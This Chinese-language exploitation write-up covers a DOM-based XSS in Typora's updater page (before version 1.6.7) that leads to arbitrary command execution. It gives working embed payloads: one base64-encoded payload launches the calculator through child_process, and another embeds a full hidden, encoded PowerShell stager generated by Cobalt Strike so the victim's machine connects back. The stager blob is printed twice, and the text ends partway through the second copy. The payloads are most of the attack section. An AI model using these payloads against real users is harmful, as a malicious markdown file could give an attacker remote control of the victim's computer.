一、漏洞详情

Typora介绍

Typora 是一款由 Abner Lee 开发的轻量级 Markdown 编辑器,与其他 Markdown 编辑器不同的是,Typora 没有采用源代码和预览双栏显示的方式,而是采用所见即所得的编辑方式,实现了即时预览的功能,但也可切换至源代码编辑模式。

漏洞描述

Windows 和 Linux 版本 1.6.7 之前的 Typora 中的 updater/update.html 中存在基于 DOM 的 XSS,该漏洞允许通过加载特制的 markdown 文件从而使得执行任意 JavaScript 代码。如果用户打开恶意 markdown 文件或者从恶意网页复制文本并将其粘贴到 Typora,通过在<embed>标签中引用 update.html,则可以利用此漏洞,此外,攻击者可以使用特权接口 reqnode 访问节点模块 child_process 并执行任意系统命令。

影响范围

Typora < 1.6.7

二、环境下载

Typora 下载地址:https://pan.baidu.com/s/1ZOh6_5BzrtCcye95ulTYBg?pwd=qqw0
提取码:qqw0

点击 typora-setup-x64-1.5.12 进行安装。

选择 Install for all users (recommended) 为所有用户安装。

选择安装路径。

 默认下一步。

 点击 Install 进行安装。

完成安装。

三、漏洞利用

3.1、计算器弹出

复现版本

新建一个 md 文件。

打开 test.md。

快捷键 Ctrl + K 新建一个代码块。

将如下 Poc 粘贴到代码块中。

<embed style="height:0;" src="typora://app/typemark/updater/updater.html?curVersion=111&newVersion=222&releaseNoteLink=333&hideAutoUpdates=false&labels=[%22%22,%22%3csvg%2fonload=top.eval(atob('cmVxbm9kZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoKHtXaW4zMjogJ2NhbGMnLCBMaW51eDogJ2dub21lLWNhbGN1bGF0b3IgLWUgIlR5cG9yYSBSQ0UgUG9DIid9KVtuYXZpZ2F0b3IucGxhdGZvcm0uc3Vic3RyKDAsNSldKQ=='))><%2fsvg>%22,%22%22,%22%22,%22%22,%22%22]">

Base64解码:reqnode('child_process').exec(({Win32: 'calc', Linux: 'gnome-calculator -e "Typora RCE PoC"'})[navigator.platform.substr(0,5)])

将代码语言设置为 HTML。

选中代码块全部内容, Ctrl + x 剪切,然后在 Ctrl + V 粘贴即可触发漏洞(注:不要粘贴到原有的代码块中,粘贴到其他空白地方)。

3.2、上线CS

 复现版本

打开 CS 生产 Powershell 命令。

 点击生成,这里我生成到桌面。

修改 POC。

<embed style="height:0;" src="typora://app/typemark/updater/updater.html?curVersion=111&newVersion=222&releaseNoteLink=333&hideAutoUpdates=false&labels=[%22%22,%22%3csvg%2fonload=top.eval(atob('Bse64加密'))><%2fsvg>%22,%22%22,%22%22,%22%22,%22%22]">

Bse64解码:reqnode('child_process').exec(({Win32: 'CS生成的PowerShell命令', Linux: 'gnome-calculator -e "Typora RCE PoC"'})[navigator.platform.substr(0,5)])

最终 POC 为如下:

<embed style="height:0;" src="typora://app/typemark/updater/updater.html?curVersion=111&newVersion=222&releaseNoteLink=333&hideAutoUpdates=false&labels=[%22%22,%22%3csvg%2fonload=top.eval(atob('reqnode('child_process').exec(({Win32: 'powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEALwA2ADEAVwBhADQAKwBpAFMAaAByACsAMwBQADAAcgArAEQAQwBKAEcAbQAyAFAANABLAFgAMQBiAEMAWQA1AEMASwBnAG8AWABoAEUAVgArADMAUQA2AFIAVgBFAEsAVwB0AHcASwBVAFAARABzACsAZQA5AGIAbwBQAGIAMAA3AFAAVABzAFQAcgBMAGIAUwBjAGMAcQA2AHIAMAA4ADkAYgB5AFgAZQBsAFUAVQBQAGEAawBSAHMAVwBFADAAOQBrAHoARQBQAEsAMABRAEMAVwAzAFAAWgBiAGoASAB4ADEAMwBzAHcAaQBoAGIAWgA0AHUAMwBQAFkAcgBlAGYATwBMAEIATgAyAEMAYQBCAEkAVQBoADgAOQBmAGoAdwB3AHcAUQA0AEQARABGAEwAeQBkAEEAMwBoAHoAUABqAEQARwBxAE0AUABrAG0ARQAwAFIAbQBUAEYARABwADQAZQBIAHgASQBmADgAVQB1AHkASABZAG8AVABjAFgAUgBQAFkASgB2AFQAawBvAHMAagB3AHoAWgBMADQAeQB4AFIAZgBlADkAMABYAFAAQQBiAGIANwArAHYAdgB2AFEAawB3AEkAYwBxAFAAcgB2AHQAcABIAEUAUgArAEcAeQBEAEcAdwBqAGMASgBpAGkAZgBrAG4AcwA3AFkAUQBRAFUAOQBUADQANABCAGcAeABQAHoARgBmAEgAbQByADkAcgBGAG4AQQBIAHcAVABTAHcAVQBBAEwAWABvAEwAMwBqAFcAegBNADgAVwBEAEkATAB0AEIAVgBmAFcAeABIAFIAVQBMAGYALwA1AFoASwBMADAAOABzAGEAOQBWAEsAWQBnAEIARABvAHMARgBOAFEAMABqADUARgBSAE4AagBBAHMAbAA1AHUAOQBTADUAbgBDAFoAKwBxAGgAWQBHAE4AdQBRAGUASwBHADMAaQA2AHAAcgAyADYAMQB6AFYAUwAxAEgAUAA4AG4AQgBqADYALwBZAEMANgBYAGIAegBmAFkAKwBvAFAAZgA0ACsAUwBVAHoAcQAxAGUAZABZAG8ARQB1AFoANQBRAGIALwBzAHAAaABvAGMASwA4AFoAUAA1AGUAWABsACsAWgBQADkANwBSAEwARwBJADMAcwBoADEAVQBsAGQAMABJAEUAYwA5AFgARQBUAG4AWgBFAEkAWABWAEEAWABCAE4AagBCAFoAbwBSADkAVQBLAEkAWQAyAFoAdQB5ACsAVQBLAEEAaQBDAG8AcABpADQAegBCADAATAAxAFQAdAA1AFIAMQBUADgANABzAFkAWQBWADYAagBkAGwAMQArADEAKwAxAHEAYwBvAFAATwBkADMARgA5AFYASwBuADUAVQBvAGwASwB6AGkASgBRAHEAdAA1AHoANABGAFQAcgBHAGUAZAA1AGMAegBkAEgAcgAvAEkARAArAFEAMwBLAFYANgBOADgAUABDAFYAWgA2AC8AUAB1AHoAVgBEAFUAUgBSAG4AcwBRAG8AYgBlAEkAOAB2AHMAaABWAHgAOABmAEgAbAA3AHkASgBhAEwAMwBLAGMANgA4ADAATQA3ADEAdgBqAEsAMQBDAGoATwBtAEkARQBEAGsAawBUAFEATAA1ADUATABFAHEAUABUADYATABUADUAWAB0ADMAZgBOAHMAUABKAFQAUQArAHgAZAA2ADYAWgB6AEQAYwA4AFYAeAAxAGYAbQBaAGUAWABaADUAdQB2AGoAUQArAG4AeABsAGoAMwBaADkAegBjAGoAdAByAEcASgBTAEgAYgArADgAMgBvAFEAMABjADUAMgBrAFoAaQA2AHcATABIAGgAUABlAEcATABuADgAVQBNADcAVABEAEsAKwBhAGoAZQB4AFMAWQBVAFoANwBGAHcATwAwAEMAbQBlAEcATwBuAGsAQgBIADYAOABxAE8AYQA1AE4AagBSAHUAMgA3ADMAQwBvADYASABOAE8ANABoAFIAVQBWAFQAbwB2AFEAOQBtAEcAcwBNAGkAdwBYAFoASABTAE8ASAA4AG4AZgBkADAAegBUADkAcwBxAE4AbABoAHUANwBTAHQAOQBKAEsANwA5ADYAegBmAFoAYgBMAEEAZwBaAGgAVwBHAEYAbQBNAGEAMQB6AFcARwBGAFUAQgBEAEEAeQBLAHcAegB2AGgAdgBiAHQAaQBJADgAagBMADEAOABXAHYAcwBFAGQAeAB6AGkAeQBJAFEAaQBqAHUANwBuAFgAMABpAGUAVQAzAGwAdwBMAG4AawBzAHIASgBvAFkAMAB1AHAAUwBHAHAAZQBvAGoAYQBBAE8AYwBzAFYASgBoAEIAcgBhAEoAdQBxAGwAcQA3ACsAOABRAEMAcAA5AHkASQBnAEMATQBhAGMAbABSAFMAeQBjAGEARQAvAG8AbAA0ADAASwBOAHMAcAB3AGgAWgB1AFgAZgA4ADYATgBVAFYAVgBFAGsATwB6ADUARwBEAHAAWABPAHUAMQBBAFAAZwB6ADMAdABPAGIAZQBLAHkAdABNAE4ANwBKAEYAWgArAEEAKwB3ADcAMwBWAHkATABZAHEATQBxAHoAdABKAEgAMABEAFQAQgBGAEMAeABGADEAVwBZAGwAVQAwAGkAMgB0AGMASwBsAFIAOABTADcAMwArAEQAOQAzADIATAArAFEANgBtAFEATgBBAHQAawBNAFcAOABFAE8AVQBkAGIAZQBqAFgATABrAEQAWgBDAGUAMABMAGIAYwBZAG8AWQBOAHEAbAByAEEAUgBmAHUAbQBtAFUAMQBWAEoAdQBCAG0AYgBQAHoAZABkADMAbwBuAE4AYQBTAFUAUwBWAGUAcwBSAHoAdQBpAEIARQByAFkAYQBhADkANwBoAGkAbwBjADcARgArADYAUQB6AFUAMQByAHAAKwBDAEIAegB3ADEAUgAzAEoAdwBsADAAVgAwAFEANgA5AGYAcQBnAFoAUwBWAHoATAB2AGIAZwBNAGkATABCAFEAQgBMAHAAZgBnAEcANQBNAE0AUgA5ADcAQgB1AFcARQBvAEIARQBPAFIAeQBTAGoAcgBCAEoAcABSAG4AUABLAFgAYgBMAGIAdABwAHkAcgBIAFEAdgBiAHMAKwBHAEQAdABXAGIAVAB6ADEAOQAwAFMASAB5AGEAZABMAHoAYwBQAGcAOABFAG4AcAByAEQAZABpAEgASQBQAGMAVgBPAHcAMwBXAGwARQBDAHEAWABHAEQATABJAGwATQBPAGUAZgBwADUARQBzAGkAbgBHAFcAKwB1AFQANwBEAGwAagBMAHgAZQBLADYASwA2AHEAMQBpAEsAZgBTAEwARgAwADUAawBlAEsANABIAGkAeQBIAGIARABPAG8AbQByAGEASABpAFMAKwArADMAQgBpAE4ATgBCAEcAeAB2AFAASwBOAGMAMwBnADgAeQBYAEgAdQB4AFAASQBOAHQAZgBPAHQAbgBlAEQAZwBSAEUATQBqADgANgBaAFIALwBWADIAUgBaAGEARAA1ADkAMQAxADcAZgBSAE8AdAA1AGYAegBoAE0AYgBtAGgAYwBSAGMAVQBQADYAUABmAGIARwAwAEEALwByAGsAdwB2AGMASABZADgASAA0AEwATwBhAGUAbQBSAEgAUwAyADIANwBvAGQAeQB3AEkAQwBBADkAbwAwAFYAVQAzAGMAZQBuAEYAYQA4AGQANgA3AE0AdAB5AGIARwBkAGUAaABUAGoASgBNAE4AcABRADIANQA0ADAAZgAzAGoAMQBsAHcARgBVAG4AMQBtAHkATgBvAEEAawB5AEEAZQAyAGsANQA2AGwAdQBUADAASgB1AE0ATQBVADEAWAB0ADAAdAAvAFIAMQBoAHcARgA3AGEAWgA1ADQAZABLAEIAMwB3AEEAdABZAGwATgBPAEUAKwByAG4ATwBlAE0AWABhAHUARgBCAFgAawA5AGQAdQBPAG4AWgBEAHIAUQA0AGMAWABHAEEASABTAGMATwBtAGgAUgAzAFkAegBBAFoAagBqAFkASgBDAGEASQBoAEMAVQA0ADQAYQBFADUAbgBNAE0ATwBkADYAMgBYAHkAOAB3AGEAZQBzAGwAUQArAE0AQQA3AEsAQwBKAFIAbABlADMAdwBBAG4AVQB1AG8AagBOAEEAcABXADYAYwB6AGMAWgBTAGsAOABrAEYAdQB4ADkAMQBNAFQANQBUAFkAcgBzAEgASgBoAHgAMgBQAFoALwBPAGQAMABsAHkASwBaADUAYwBZAFQAYQBqAGcASgBqAHQAYwB6AE0AKwA4AGEAYgBDAGIAdQBLAFcAdQBOADYASQAyAGgARgBvAG4AWQBkAGQAcgBNAG0AZwA1AFQAYwAvAFMARgBvAG0AVwBOAHMAcABwAEoAMwBDAG4ANAB0AGsAYwB3AHIASwBnAGcARgBGAFUAMgA5AEcAVwBSAFgAWgA5AHcAZgBzAHQAWgBrACsAOAAyAHIASAByAFYAbgBKAFkAcABSAE4ATwBrADcAWQBMADAAUgBsAEsAaQB5AE8ANwA2AGMAOABuADgAYgBLAEgAUgA4AHQAYQBSAHgAQwA3AGMAQwBLAGQAeAA4AHAAYwBTAHEAWgBhAGIAYgBoAFIAagA3ADMAWgB3AHQAcQBMAGgAdABzAE4AdAB2AHUAeABJAFMANwBHAE8AbAA5AGYAMABIAGkAWQA0ADEAVwBQAEYANAAwAE4ARgBIAHYANwBtAHQAcgBuAEoAMwBWAE4AOAB3AGUAWgB2AGQAeABHAHMAaABmAEIAawBlADAAdABCAHgATgBoAFYAUQBzAG4AMABtAEkAdgBpAG0AdgBXAE0AUgBOADYAeAB2AEUANgBmADIAYQBqAEwAVwBWAFYAWABFAHcAYwB3AFcANwA0AGMAcgB2AGIAZABnACsARABSAGsAcgBuAGgAcgBHAHgAbgB2AG8AegBRAFIAOQBlAFoAdQBsAHkAMAArADIAYwBzAGEAMwAvAGQAdQA1AE8AVgB4AEoAbgBKAE0AZABnAHcAMQB1AHQAZwA4AFUAZQB5AGMAeABpAGwAOABOAG8AUABpAEoAeQAwAGwAMQBQADkAWABWAGoAcABFADYAMgA3AFMAawBNAEoAbwBmAE8AVwBOAGMAWAA0AHEASwA5AFYAVgBSAGgAcwBOADcAMQAwADIAawB5AGIAOABsADcAVgBtADYAMwArAGoAWQAvAGwAagB1AGMAWQBYAEoAQwArAC8AbABpAEQAVQBkAFcAYwA5ADkASABrAHIASgBjAFEAMwBVAHQAQwBuADAATgBtAE0AMQB1AGkAawBoAGYANAB5AEYAdwBGADEASQBEAEsAQgBiAGYAWABBAGQAQwBPAFYARAA5AG0ARgAxAE0ARQBVADQAdABWAGQATABVADAANwBUAGQAMABnAFYAdwBPAGMALwBLAEsANgA0AG0AbQAvAEMAeQBUAEoAVgBrAG8ANABIACsAaQBjAGQANABaADQAQwBXAEgAMgBrAHIAagBTAGoAMQBSAFgAYwB5AHQAMwBRAGsAZwBQAEUAZwBQAEsAeQBGAEcAdQA2AHkANQBVAEcAMAB2AHUAdwB1AHgAeQAxAGYAUgBwADYAMgBGAGQAMwBXACsAYQBEADcAOQBTAFgAMgBlAHUAdwAxAHAANABNAHQAegBWAFYAYQBvAHkATgBEAHYAbQBTADEATwBnAEoANgBYAHIATwBqAEwAVwBxAFkANQB5AFMANgBjAE8AQwA1AGUANABiADkATwBFAGoAbwBmADQAMwBtAFoASABsAE4AWgBjACsAWgBUAEIAQgB3AE4ASwA4AHAAagA4AEcAWgA1AGoAVgBvAGkAUwA3AGYATQBnADYAcgA1AHEAbwBYAEMAQQBzAGkAeAB3AEsAdABlADYATwBHADYAdABFAHoAUwBQAFcARABUAE8AMwBDAHMAcQBpAGMASgBzACsAdwAzAHAAVwBCAE4ASwArAHAAdgBRAFcATgAyAGIANABHAHEAQwAxAFcAMwBrAGwAZgA4AHoAYQA1ADgAdwBpAGQAZgBKAEoAcwBtAHYAZwBIAFEAMwArAGYAYwBNAFMAOABOAHoAdgBhADQAbQBoAHIAegBiADYAWAB5ADMAawA3AGYASABnAC8AZQB2AG0AUwB2AE4ANQBIAHkAUABmADkAawA1AEYAUQBjAC8AWABtADQAOABQAGYAOQAxAG4AaABCAEQANQAwAHoASgA5AE4AWgBtAE4AQQBRAGcAdABnADIAawBuAHAAZABIAFYALwBHADMAcwBlADYAZAAxAG0AcABKAGwAbgBaAHgAcgBGADQAdQBkAGoALwBSAEUAUgBGADIARQA2ADgAdABLAGgAKwBQADYAaQAwAEgAQgA1AE0ASgB2AHEAZgBqAEoAZQAvAGYASABlADgAKwBuAEwAcQBkAEYAbABuAGYAdAAwAFYAZgByADIATwBKAFIASwA5ADIAZgBQAGkASABlADcAZgBQAFMANQBYAGYARQArAEEAWAA1ADcAUgByAGIAMABmAHAAVQBQAFIAQwByAEkAMwBVAGQAVwBoAGEAawBsADkAVgBxAHQAbAB2ADAAMgBhAHQAVABhAHIAeABNAGoAZQBIADUAYQBmAEwAZABYAHkAVwBhAC8ARAAxAEEAKwB1AHMASwA1AHEALwBkAGgAagBjAFMAdQBnAC8ANgBQAE0AZgBqAE8ANgAzADkAbgBOACsATQB2AG4AeAArAC8AcwBaAGMAagArAHAAeQB5ADcARQBIACsARgA4AEcARABsAHIAUABmAEQAUQBBAEEAIgApACkAOwBJAEUAWAAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAkAHMALABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwA=', Linux: 'gnome-calculator -e "Typora RCE PoC"'})[navigator.platform.substr(0,5)])'))><%2fsvg>%22,%22%22,%22%22,%22%22,%22%22]">

新建一个 md 文件。

打开 test.md。

 快捷键 Ctrl + K 新建一个代码块。

 将刚刚修改后的 POC 粘贴到代码块中,并将代码语言修改为 HTML。

<embed style="height:0;" src="typora://app/typemark/updater/updater.html?curVersion=111&newVersion=222&releaseNoteLink=333&hideAutoUpdates=false&labels=[%22%22,%22%3csvg%2fonload=top.eval(atob('reqnode('child_process').exec(({Win32: 'powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEALwA2ADEAVwBhADQAKwBpAFMAaAByACsAMwBQADAAcgArAEQAQwBKAEcAbQAyAFAANABLAFgAMQBiAEMAWQA1AEMASwBnAG8AWABoAEUAVgArADMAUQA2AFIAVgBFAEsAVwB0AHcASwBVAFAARABzACsAZQA5AGIAbwBQAGIAMAA3AFAAVABzAFQAcgBMAGIAUwBjAGMAcQA2AHIAMAA4ADkAYgB5AFgAZQBsAFUAVQBQAGEAawBSAHMAVwBFADAAOQBrAHoARQBQAEsAMABRAEMAVwAzAFAAWgBiAGoASAB4ADEAMwBzAHcAaQBoAGIAWgA0AHUAMwBQAFkAcgBlAGYATwBMAEIATgAyAEMAYQBCAEkAVQBoADgAOQBmAGoAdwB3AHcAUQA0AEQARABGAEwAeQBkAEEAMwBoAHoAUABqAEQARwBxAE0AUABrAG0ARQAwAFIAbQBUAEYARABwADQAZQBIAHgASQBmADgAVQB1AHkASABZAG8AVABjAFgAUgBQAFkASgB2AFQAawBvAHMAagB3AHoAWgBMADQAeQB4AFIAZgBlADkAMABYAFAAQQBiAGIANwArAHYAdgB2AFEAawB3AEkAYwBxAFAAcgB2AHQAcABIAEUAUgArAEcAeQBEAEcAdwBqAGMASgBpAGkAZgBrAG4AcwA3AFkAUQBRAFUAOQBUADQANABCAGcAeABQAHoARgBmAEgAbQByADkAcgBGAG4AQQBIAHcAVABTAHcAVQBBAEwAWABvAEwAMwBqAFcAegBNADgAVwBEAEkATAB0AEIAVgBmAFcAeABIAFIAVQBMAGYALwA1AFoASwBMADAAOABzAGEAOQBWAEsAWQBnAEIARABvAHMARgBOAFEAMABqADUARgBSAE4AagBBAHMAbAA1AHUAOQBTADUAbgBDAFoAKwBxAGgAWQBHAE4AdQBRAGUASwBHADMAaQA2AHAAcgAyADYAMQB6AFYAUwAxAEgAUAA4AG4AQgBqADYALwBZAEMANgBYAGIAegBmAFkAKwBvAFAAZgA0ACsAUwBVAHoAcQAxAGUAZABZAG8ARQB1AFoANQBRAGIALwBzAHAAaABvAGMASwA4AFoAUAA1AGUAWABsACsAWgBQADkANwBSAEwARwBJADMAcwBoADEAVQBsAGQAMABJAEUAYwA5AFgARQBUAG4AWgBFAEkAWABWAEEAWABCAE4AagBCAFoAbwBSADkAVQBLAEkAWQAyAFoAdQB5ACsAVQBLAEEAaQBDAG8AcABpADQAegBCADAATAAxAFQAdAA1AFIAMQBUADgANABzAFkAWQBWADYAagBkAGwAMQArADEAKwAxAHEAYwBvAFAATwBkADMARgA5AFYASwBuADUAVQBvAGwASwB6AGkASgBRAHEAdAA1AHoANABGAFQAcgBHAGUAZAA1AGMAegBkAEgAcgAvAEkARAArAFEAMwBLAFYANgBOADgAUABDAFYAWgA2AC8AUAB1AHoAVgBEAFUAUgBSAG4AcwBRAG8AYgBlAEkAOAB2AHMAaABWAHgAOABmAEgAbAA3AHkASgBhAEwAMwBLAGMANgA4ADAATQA3ADEAdgBqAEsAMQBDAGoATwBtAEkARQBEAGsAawBUAFEATAA1ADUATABFAHEAUABUADYATABUADUAWAB0ADMAZgBOAHMAUABKAFQAUQArAHgAZAA2ADYAWgB6AEQAYwA4AFYAeAAxAGYAbQBaAGUAWABaADUAdQB2AGoAUQArAG4AeABsAGoAMwBaADkAegBjAGoAdAByAEcASgBTAEgAYgArADgAMgBvAFEAMABjADUAMgBrAFoAaQA2AHcATABIAGgAUABlAEcATABuADgAVQBNADcAVABEAEsAKwBhAGoAZQB4AFMAWQBVAFoANwBGAHcATwAwAEMAbQBlAEcATwBuAGsAQgBIADYAOABxAE8AYQA1AE4AagBSAHUAMgA3ADMAQwBvADYASABOAE8ANABoAFIAVQBWAFQAbwB2AFEAOQBtAEcAcwBNAGkAdwBYAFoASABTAE8ASAA4AG4AZgBkADAAegBUADkAcwBxAE4AbABoAHUANwBTAHQAOQBKAEsANwA5ADYAegBmAFoAYgBMAEEAZwBaAGgAVwBHAEYAbQBNAGEAMQB6AFcARwBGAFUAQgBEAEEAeQBLAHcAegB2AGgAdgBiAHQAaQBJADgAagBMADEAOABXAHYAcwBFAGQAeAB6AGkAeQBJAFEAaQBqAHUANwBuAFgAMABpAGUAVQAzAGwAdwBMAG4AawBzAHIASgBvAFkAMAB1AHAAUwBHAHAAZQBvAGoAYQBBAE8AYwBzAFYASgBoAEIAcgBhAEoAdQBxAGwAcQA3ACsAOABRAEMAcAA5AHkASQBnAEMATQBhAGMAbABSAFMAeQBjAGEARQAvAG8AbAA0ADAASwBOAHMAcAB3AGgAWgB1AFgAZgA4ADYATgBVAFYAVgBFAGsATwB6ADUARwBEAHAAWABPAHUAMQBBAFAAZwB6ADMAdABPAGIAZQBLAHkAdABNAE4ANwBKAEYAWgArAEEAKwB3ADcAMwBWAHkATABZAHEATQBxAHoAdABKAEgAMABEAFQAQgBGAEMAeABGADEAVwBZAGwAVQAwAGkAMgB0AGMASwBsAFIAOABTADcAMwArAEQAOQAzADIATAArAFEANgBtAFEATgBBAHQAawBNAFcAOABFAE8AVQBkAGIAZQBqAFgATABrAEQAWgBDAGUAMABMAGIAYwBZAG8AWQBOAHEAbAByAEEAUgBmAHUAbQBtAFUAMQBWAEoAdQBCAG0AYgBQAHoAZABkADMAbwBuAE4AYQBTAFUAUwBWAGUAcwBSAHoAdQBpAEIARQByAFkAYQBhADkANwBoAGkAbwBjADcARgArADYAUQB6AFUAMQByAHAAKwBDAEIAegB3ADEAUgAzAEoAdwBsADAAVgAwAFEANgA5AGYAcQBnAFoAUwBWAHoATAB2AGIAZwBNAGkATABCAFEAQgBMAHAAZgBnAEcANQBNAE0AUgA5ADcAQgB1AFcARQBvAEIARQBPAFIAeQBTAGoAcgBCAEoAcABSAG4AUABLAFgAYgBMAGIAdABwAHkAcgBIAFEAdgBiAHMAKwBHAEQAdABXAGIAVAB6ADEAOQAwAFMASAB5AGEAZABMAHoAYwBQAGcAOABFAG4AcAByAEQAZABpAEgASQBQAGMAVgBPAHcAMwBXAGwARQBDAHEAWABHAEQATABJAGwATQBPAGUAZgBwADUARQBzAGkAbgBHAFcAKwB1AFQANwBEAGwAagBMAHgAZQBLADYASwA2AHEAMQBpAEsAZgBTAEwARgAwADUAawBlAEsANABIAGkAeQBIAGIARABPAG8AbQByAGEASABpAFMAKwArADMAQgBpAE4ATgBCAEcAeAB2AFAASwBOAGMAMwBnADgAeQBYAEgAdQB4AFAASQBOAHQAZgBPAHQAbgBlAEQAZwBSAEUATQBqADgANgBaAFIALwBWADIAUgBaAGEARAA1ADkAMQAxADcAZgBSAE8AdAA1AGYAegBoAE0AYgBtAGgAYwBSAGMAVQBQADYAUABmAGIARwAwAEEALwByAGsAdwB2AGMASABZADgASAA0AEwATwBhAGUAbQBSAEgAUwAyADIANwBvAGQAeQB3AEkAQwBBADkAbwAwAFYAVQAzAGMAZQBuAEYAYQA4AGQANgA3AE0AdAB5AGIARwBkAGUAaABUAGoASgBNAE4AcABRADIANQA0ADAAZgAzAGoAMQBsAHcARgBVAG4AMQBtAHkATgBvAEEAawB5AEEAZQAyAGsANQA2AGwAdQBUADAASgB1AE0ATQBVADEAWAB0ADAAdAAvAFIAMQBoAHcARgA3AGEAWgA1ADQAZABLAEIAMwB3AEEAdABZAGwATgBPAEUAKwByAG4ATwBlAE0AWABhAHUARgBCAFgAawA5AGQAdQBPAG4AWgBEAHIAUQA0AGMAWABHAEEASABTAGMATwBtAGgAUgAzAFkAegBBAFoAagBqAFkASgBDAGEASQBoAEMAVQA0ADQAYQBFADUAbgBNAE0ATwBkADYAMgBYAHkAOAB3AGEAZQBzAGwAUQArAE0AQQA3AEsAQwBKAFIAbABlADMAdwBBAG4AVQB1AG8AagBOAEEAcABXADYAYwB6AGMAWgBTAGsAOABrAEYAdQB4ADkAMQBNAFQANQBUAFkAcgBzAEgASgBoAHgAMgBQAFoALwBPAGQAMABsAHkASwBaADUAYwBZAFQAYQBqAGcASgBqAHQAYwB6AE0AKwA4AGEAYgBDAGIAdQBLAFcAdQBOADYASQAyAGgARgBvAG4AWQBkAGQAcgBNAG0AZwA1AFQAYwAvAFMARgBvAG0AVwBOAHMAcABwAEoAMwBDAG4ANAB0AGsAYwB3AHIASwBnAGcARgBGAFUAMgA5AEcAVwBSAFgAWgA5AHcAZgBzAHQAWgBrACsAOAAyAHIASAByAFYAbgBKAFkAcABSAE4ATwBrADcAWQBMADAAUgBsAEsAaQB5AE8ANwA2AGMAOABuADgAYgBLAEgAUgA4AHQAYQBSAHgAQwA3AGMAQwBLAGQAeAA4AHAAYwBTAHEAWgBhAGIAYgBoAFIAagA3ADMAWgB3AHQAcQBMAGgAdABzAE4AdAB2AHUAeABJAFMANwBHAE8AbAA5AGYAMABIAGkAWQA0ADEAVwBQAEYANAAwAE4ARgBIAHYANwBtAHQAcgBuAEoAMwBWAE4AOAB3AGUAWgB2AGQAeABHAHMAaABmAEIAawBlADAAdABCAHgATgBoAFYAUQBzAG4AMABtAEkAdgBpAG0AdgBXAE0AUgBOADYAeAB2AEUANgBmADIAYQBqAEwAVwBWAFYAWABFAHcAYwB3AFcANwA0AGMAcgB2AGIAZABnACsARABSAGsAcgBuAGgAcgBHAHgAbgB2AG8AegBRAFIAOQBlAFoAdQBsAHkAMAArADIAYwBzAGEAMwAvAGQAdQA1AE8AVgB4AEoAbgBKAE0AZABnAHcAMQB1AHQAZwA4AFUAZQB5AGMAeABpAGwAOABOAG8AUABpAEoAeQAwAGwAMQBQADkAWABWAGoAcABFADYAMgA3AFMAawBNAEoAbwBmAE8AVwBOAGMAWAA0AHEASwA5AFYAVgBSAGgAcwBOADcAMQAwADIAawB5AGIAOABsADcAVgBtADYAMwArAGoAWQAvAGwAagB1AGMAWQBYAEoAQwArAC8AbABpAEQAVQBkAFcAYwA5ADkASABrAHIASgBjAFEAMwBVAHQAQwBuADAATgBtAE0AMQB1AGkAawBoAGYANAB5AEYAdwBGADEASQBEAEsAQgBiAGYAWABBAGQAQwBPAFYARAA5AG0ARgAxAE0ARQBVADQAdABWAGQATABVADAANwBUAGQAMABnAFYAdwBPAGMALwBLAEsANgA0AG0AbQAvAEMAeQBUAEoAVgBrAG8ANABIACsAaQBjAGQANABaADQAQwBXAEgAMgBrAHIAagBTAGoAMQBSAFgAYwB5AHQAMwBRAGsAZwBQAEUAZwBQAEsAeQBGAEcAdQA2AHkANQBVAEcAMAB2AHUAdwB1AHgAeQAxAGYAUgBwADYAMgBGAGQAMwBXACsAYQBEADcAOQBTAFgAMgBlAHUAdwAxAHAANABNAHQAegBWAFYAYQBvAHkATgBEAHYAbQBTADEATwBnAEoANgBYAHIATwBqAEwAVwBxAFkANQB5AFMANgBjAE8AQwA1AGUANABiADkATwBFAGoAbwBmADQAMwBtAFoASABsAE4AWgBjACsAWgBUAEIAQgB3AE4ASwA4AHAAagA4AEcAWgA1AGoAVgBvAGkAUwA3AGYATQBnADYAcgA1AHEAbwBYAEMAQQBzAGkAeAB3AEsAdABlADYATwBHADYAdABFAHoAUwBQAFcARABUAE8AMwBDAHMAcQBpAGMASgBzACsAdwAzAHAAVwBCAE4ASwArAHAAdgBRAFcATgAyAGIANABHAHEAQwAxAFcAMwBrAGwAZgA4AHoAYQA1ADgAdwBpAGQAZgBKAEoAcwBtAHYAZwBIAFEAMwArAGYAYwBNAFMAOABOAHoAdgBhADQAbQBoAHIAegBiADYAWAB5ADMAawA3AGYASABnAC8AZQB2AG0AUwB2AE4ANQBIAHkAUABmADkAawA1AEYAUQBjAC8AWABtADQAOABQAGYAOQAxAG4AaABCAEQANQAwAHoASgA5AE4AWgBtAE4AQQBRAGcAdABnADIAawBuAHAAZABIAFYALwBHADMAcwBlADYAZAAxAG0AcABKAGwAbgBaAHgAcgBGADQAdQBkAGoALwBSAEUAUgBGADIARQA2ADgAdABLAGgAKwBQADYAaQAwAEgAQgA1AE0ASgB2AHEAZgBqAEoAZQAvAGYASABlADgAKwBuAEwAcQBkAEYAbABuAGYAdAAwAFYAZgByADIATwBKAFIASwA5ADIAZgBQAGkASABlADcAZgBQAFMANQBYAGYARQArAEEAWAA1ADcAUgByAGIAMABmAHAAVQBQAFIAQwByAEkAMwBVAGQAVwBoAGEAawBsADkAVgBxAHQAbAB2ADAAMgBhAHQAVABhAHIAeABNAGoAZQBIADUAYQBmAEwAZABYAHkAVwBhAC8ARAAxAEEAKw